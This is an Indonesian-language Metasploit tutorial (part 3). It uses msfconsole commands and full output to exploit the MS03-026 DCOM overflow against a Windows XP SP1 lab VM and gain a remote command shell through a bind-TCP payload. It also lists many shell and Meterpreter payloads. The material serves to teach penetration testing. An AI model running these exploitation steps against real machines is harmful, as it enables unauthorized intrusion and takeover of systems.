Tutorial Metasploit (3)

Memahami Eksploitasi dan Kebutuhan Metasploit (3)

Oleh : Reza Ervani (rezaervani@gmail.com)

Special Thanks to : Vivek Ramachandran – http://www.vivekramachandran.com/

Sekilas Metasploit

  • Perangkat untuk pengembangan dan pengujian vulnerabilitas
  • Dapat digunakan untuk : Uji penetrasi, riset exploit, mengembangkan signature IDS
  • Dimulai oleh H.D. Moore pada tahun 2003
  • Open Source dan Bebas untuk Digunakan
  • Ditulis dalam Bahasa Ruby

Metasploit untuk Pentesting

  • Memiliki lebih dari 600 exploit yang sudah diuji
  • Memiliki lebih dari 200 payload dan 27 enkoder
  • Menawarkan Plug and Play Payload dalam exploit
  • Ribuan fitur lain untuk pentest yang lebih baik dan lebih cepat

Praktikum

Seperti yang disampaikan dalam tutorial sebelumnya, kita akan mencoba menggunakan framework metasploit untuk melakukan hal yang sama di tutorial 2 :

Lingkungan kerja kita kali ini adalah Ubuntu 10.04.3 yang menjalankan metasploit dan Windows XP SP 1 Home Edition yang dijalankan di Virtual Box. (Klik Gambar untuk Memperbesar)

Lingkungan kerja Ubuntu yang menjalankan Metasploit dan Virtual Box dengan WinXP SP 1 Home Edition yang akan menjadi komputer target

Jalankan metasploit di komputer anda :

msfconsole

Kita cari module dcom

msf > search dcom

Keluarannya akan tampak seperti :


Matching Modules
================

Name                                       Disclosure Date  Rank   Description
----                                       ---------------  ----   -----------
exploit/windows/dcerpc/ms03_026_dcom       2003-07-16       great  Microsoft RPC DCOM Interface Overflow
exploit/windows/driver/broadcom_wifi_ssid  2006-11-11       low    Broadcom Wireless Driver Probe Response SSID Overflow
exploit/windows/smb/ms04_031_netdde        2004-10-12       good   Microsoft NetDDE Service Overflow

Kita akan gunakan modul  ms03_026_dcom :

msf > use /windows/dcerpc/ms03_026_dcom

Keluarannya :

msf  exploit(ms03_026_dcom) >

Lalu kita lihat apa saja opsi yang ada :

msf  exploit(ms03_026_dcom) > show options

Keluarannya akan tampak seperti :


Module options (exploit/windows/dcerpc/ms03_026_dcom):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  135              yes       The target port

Exploit target:

Id  Name
--  ----
0   Windows NT SP3-6a/2000/XP/2003 Universal

Terlihat bahwa ada opsi RHOST untuk mencantumkan alamat komputer target dan RPORT untuk menentukan port di komputer target.

Kita cek IP komputer target :

Lalu kita set RHOST sesuai dengan IP Komputer Target

msf  exploit(ms03_026_dcom) > set RHOST 192.168.1.3
RHOST => 192.168.1.3

Selanjutnya kita lihat opsi Payload apa saja yang ada dengan perintah show payloads :

msf  exploit(ms03_026_dcom) > show payloads

Keluarannya akan tampak seperti berikut, menunjukkan banyak sekali payload yang bisa disertakan (Bayangkan kalau semuanya harus kita buat dari scratch)  :


Compatible Payloads
===================

Name                                             Disclosure Date  Rank    Description
----                                             ---------------  ----    -----------
generic/custom                                                    normal  Custom Payload
generic/debug_trap                                                normal  Generic x86 Debug Trap
generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
generic/tight_loop                                                normal  Generic x86 Tight Loop
windows/adduser                                                   normal  Windows Execute net user /ADD
windows/dllinject/bind_ipv6_tcp                                   normal  Reflective Dll Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp                                   normal  Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp                                        normal  Reflective Dll Injection, Bind TCP Stager
windows/dllinject/reverse_http                                    normal  Reflective Dll Injection, Reverse HTTP Stager
windows/dllinject/reverse_ipv6_tcp                                normal  Reflective Dll Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp                                normal  Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp                                 normal  Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp                                     normal  Reflective Dll Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports                            normal  Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns                                 normal  Reflective Dll Injection, Reverse TCP Stager (DNS)
windows/download_exec                                             normal  Windows Executable Download and Execute
windows/exec                                                      normal  Windows Execute Command
windows/loadlibrary                                               normal  Windows LoadLibrary Path
windows/messagebox                                                normal  Windows MessageBox
windows/meterpreter/bind_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp                                      normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/reverse_http                                  normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
windows/meterpreter/reverse_https                                 normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp                               normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp                                   normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports                          normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp                                           normal  Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp                                        normal  Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp                            normal  Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp                            normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp                                 normal  Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/reverse_ipv6_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp                          normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp                              normal  Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports                     normal  Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns                          normal  Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp                          normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp                          normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp                               normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager
windows/patchupmeterpreter/reverse_ipv6_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp                        normal  Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp                            normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports                   normal  Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns                        normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
windows/shell/bind_ipv6_tcp                                       normal  Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp                                       normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp                                            normal  Windows Command Shell, Bind TCP Stager
windows/shell/reverse_http                                        normal  Windows Command Shell, Reverse HTTP Stager
windows/shell/reverse_ipv6_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp                                     normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports                                normal  Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns                                     normal  Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell_bind_tcp                                            normal  Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw                                       normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Inline
windows/speak_pwned                                               normal  Windows Speech API - Say "You Got Pwned!"
windows/upexec/bind_ipv6_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp                                           normal  Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_http                                       normal  Windows Upload/Execute, Reverse HTTP Stager
windows/upexec/reverse_ipv6_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp                                    normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp                                        normal  Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports                               normal  Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns                                    normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp                                        normal  VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_http                                    normal  VNC Server (Reflective Injection), Reverse HTTP Stager
windows/vncinject/reverse_ipv6_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp                                 normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp                                     normal  VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports                            normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)

Kita akan coba modul windows/shell_bind_tcp, karena kita ingin melakukan hal yang sama dengan yang kita lakukan di tutorial 2.

msf  exploit(ms03_026_dcom) > set PAYLOAD  windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp

Kita lihat opsi apa saja yang ada :

msf  exploit(ms03_026_dcom) > show options

Keluarannya akan tampak seperti :


Module options (exploit/windows/dcerpc/ms03_026_dcom):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  192.168.1.3      yes       The target address
RPORT  135              yes       The target port

Payload options (windows/shell_bind_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
LPORT     4444             yes       The listen port
RHOST     192.168.1.3      no        The target address

Exploit target:

Id  Name
--  ----
0   Windows NT SP3-6a/2000/XP/2003 Universal

Saatnya kita lakukan exploit dengan secara sederhana mengetikkan perintah exploit :

msf  exploit(ms03_026_dcom) > exploit

Maka yang akan kita peroleh adalah :


[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.3[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.3[135] ...
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.1.2:34778 -> 192.168.1.3:4444) at Sun Aug 28 15:56:48 +0700 2011

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Anda lihat, kita berhasil kembali masuk ke komputer target dan mendapatkan prompt-nya.

Hal selanjutnya yang bisa kita lakukan bisa saja serupa dengan apa yang dijelaskan di Tutorial 2 yang lalu atau bisa juga hal yang lainnya.

Kesimpulan

Dua cara yang kita gunakan, di Tutorial 2 dan Tutorial 3 membandingkan metode yang berbeda untuk target yang sama. Contoh ini memperlihatkan betapa penggunaan metasploit membuat pekerjaan seorang analis keamanan informasi dapat menjadi lebih mudah, karena dia tidak harus membuat kode exploit dan payload dari nol, tetapi sudah disediakan dalam bentuk framework oleh Metasploit.

Dalam tutorial berikutnya insya Allah kita akan melihat lebih dalam penggunaan metasploit ini.

Semoga bermanfaat.

Bersambung (rezaervani@gmail.com)

Tutorial Sebelumnya :